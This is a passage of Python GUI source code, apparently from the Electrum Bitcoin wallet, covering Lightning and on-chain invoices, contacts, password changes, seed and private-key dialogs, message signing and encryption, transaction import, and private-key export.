chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
return
# display colorful lightning icon to signal connection
self.lightning_button.setIcon(read_QIcon("lightning.png"))
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
